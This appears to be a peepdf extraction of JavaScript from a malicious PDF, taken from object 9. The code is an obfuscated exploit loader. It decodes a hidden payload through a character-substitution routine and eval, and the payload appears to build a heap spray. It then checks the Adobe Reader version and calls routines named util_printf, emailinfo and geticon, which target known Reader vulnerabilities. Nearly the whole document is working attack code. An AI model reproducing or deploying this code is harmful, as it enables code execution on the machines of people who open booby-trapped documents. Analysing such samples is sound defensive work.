// peepdf comment: Javascript code located in object 9 (version 0)

function ZMA6JrnNDKn96im9JWocihWFdizGvYoOue4rS0MMt5n75qwrLk(oXmIf0PBgabAXdoLTy2JDyi9xRpTRlqNrkkQylzjx) {
    return oXmIf0PBgabAXdoLTy2JDyi9xRpTRlqNrkkQylzjx.split("{S").join("");
}
var WtYjrzysvdwPDugBhOtXpDoKaw8tQf = ZMA6JrnNDKn96im9JWocihWFdizGvYoOue4rS0MMt5n75qwrLk("[S[s!\r[S%)[S[s!\n[S%)[S[s!\r[S%)[S[s!\n[S%)Anl%uBU44pDFU%[S[s!=[S%)%EwUupnHU)[S[s!\"[S%)[S[s!\"[S%)t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)jnlfnjU%[S[s!=[S%)%EwUupnHU)[S[s!\"[S%)[S[s!\"[S%)t%[S[s!+[S%)%uBU44pDFU[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)wDHf4Dpr%[S[s!=[S%)%EwUupnHU)[S[s!\"[S%)[S[s!\"[S%)t[S[s!;[S%)%[S[s!\r[S%)[S[s!\n[S%)BUnFUlumvU%[S[s!=[S%)%q8[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)np4%[S[s!=[S%)%BUnFUlumvU[S[s!+[S%)jnlfnjU,4UwjiB[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)[S[s!\r[S%)[S[s!\n[S%)QBm4U%)wDHf4Dpr,4UwjiB>np4t%wDHf4Dpr[S[s!+[S%)[S[s!=[S%)wDHf4Dpr[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)Cm44f4Dpr%[S[s!=[S%)%wDHf4Dpr,uEfuilmwj)8 %np4t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)f4Dpr%[S[s!=[S%)%wDHf4Dpr,uEfuilmwj)8 %wDHf4Dpr,4UwjiB[S[s!-[S%)np4t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)QBm4U)f4Dpr,4UwjiB[S[s!+[S%)np4>8yh8888t%f4Dpr%[S[s!=[S%)%f4Dpr[S[s!+[S%)f4Dpr[S[s!+[S%)Cm44f4Dpr[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)WUWDlo%[S[s!=[S%)%wUQ%kllno)t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)CDl%)m[S[s!=[S%)8[S[s!;[S%)m>qO8[S[s!;[S%)m[S[s!+[S%)[S[s!+[S%)t%WUWDlo[S[s![[S%)m[S[s!][S%)%[S[s!=[S%)%f4Dpr%[S[s!+[S%)%jnlfnjU[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)Anl%fECCUlumvU%[S[s!=[S%)%h8q5[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)Anl%fECCUl%[S[s!=[S%)%kllno)fECCUlumvUt[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)CDl%)m[S[s!=[S%)8[S[s!;[S%)%m>fECCUlumvU[S[s!;[S%)%m[S[s!+[S%)[S[s!+[S%)t[S[s!\r[S%)[S[s!\n[S%)[S[s!{[S%)[S[s!\r[S%)[S[s!\n[S%)fECCUl[S[s![[S%)m[S[s!][S%)%[S[s!=[S%)%EwUupnHU)[S[s!\"[S%)&8n&8n&8n&8n[S[s!\"[S%)t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)[S[s!}[S%)[S[s!\r[S%)[S[s!\n[S%)[S[s!\r[S%)[S[s!\n[S%)sD44nf,jUiapDw)fECCUl[S[s!+[S%)[S[s!\"[S%)[S[s!_[S%)M,fEwF4U[S[s!\"[S%)t[S[s!;[S%)[S[s!\r[S%)[S[s!\n[S%)[S[s!\r[S%)[S[s!\n[S%)");

function zsWKsgP6kZRhoObh(AdzEzPUE9Cl1xRvqF) {
    var NDc87EJsh0Oy58amki68fJfOJ3UNcWIS6nJThUEkth, UMDwhfpvM0dzKLEqw9hi3PeJzYAsbZq6FvmDk, YwS3HUDFYZNfRRmGZmlW0oBPLHNNh, APfpvxJrU1FBC3Z1t0r6 = "",
        ZNNhlsB9820xk5h4EkaxdEXaaGtRA3UUyKeB6JGU9hdtBkcMp = "<>., %&!@()timWXgjTRcpHdF1qYG2508OJzvAkrl4hBIanwQVeULPNM36SbfCsuE97KxyoDZ1234567890";
    for (NDc87EJsh0Oy58amki68fJfOJ3UNcWIS6nJThUEkth = 0; NDc87EJsh0Oy58amki68fJfOJ3UNcWIS6nJThUEkth < AdzEzPUE9Cl1xRvqF.length; NDc87EJsh0Oy58amki68fJfOJ3UNcWIS6nJThUEkth++) {
        UMDwhfpvM0dzKLEqw9hi3PeJzYAsbZq6FvmDk = AdzEzPUE9Cl1xRvqF.charAt(NDc87EJsh0Oy58amki68fJfOJ3UNcWIS6nJThUEkth);
        YwS3HUDFYZNfRRmGZmlW0oBPLHNNh = ZNNhlsB9820xk5h4EkaxdEXaaGtRA3UUyKeB6JGU9hdtBkcMp.indexOf(UMDwhfpvM0dzKLEqw9hi3PeJzYAsbZq6FvmDk);
        if (YwS3HUDFYZNfRRmGZmlW0oBPLHNNh > -1) {
            if (YwS3HUDFYZNfRRmGZmlW0oBPLHNNh == 0) {
                YwS3HUDFYZNfRRmGZmlW0oBPLHNNh = 79
            }
            APfpvxJrU1FBC3Z1t0r6 += ZNNhlsB9820xk5h4EkaxdEXaaGtRA3UUyKeB6JGU9hdtBkcMp.charAt(YwS3HUDFYZNfRRmGZmlW0oBPLHNNh - 1)
        } else {
            APfpvxJrU1FBC3Z1t0r6 += UMDwhfpvM0dzKLEqw9hi3PeJzYAsbZq6FvmDk
        }
    };
    return (APfpvxJrU1FBC3Z1t0r6);
}
eval(zsWKsgP6kZRhoObh(WtYjrzysvdwPDugBhOtXpDoKaw8tQf));

var temp2 = app.viewerVersion.toString();
temp2 = temp2.replace(/\D/g, "");
var temp = new Array(temp2.charAt(0), temp2.charAt(1), temp2.charAt(2));

if ((temp[0] == 8) && (temp[1] == 0) || (temp[1] == 1 && temp[2] < 3)) {
    util_printf();
}
if ((temp[0] < 8) || (temp[0] == 8 && temp[1] < 2 && temp[2] < 2)) {
    emailinfo();
}
if ((temp[0] < 9) || (temp[0] == 9 && temp[1] < 1)) {
    geticon();
}

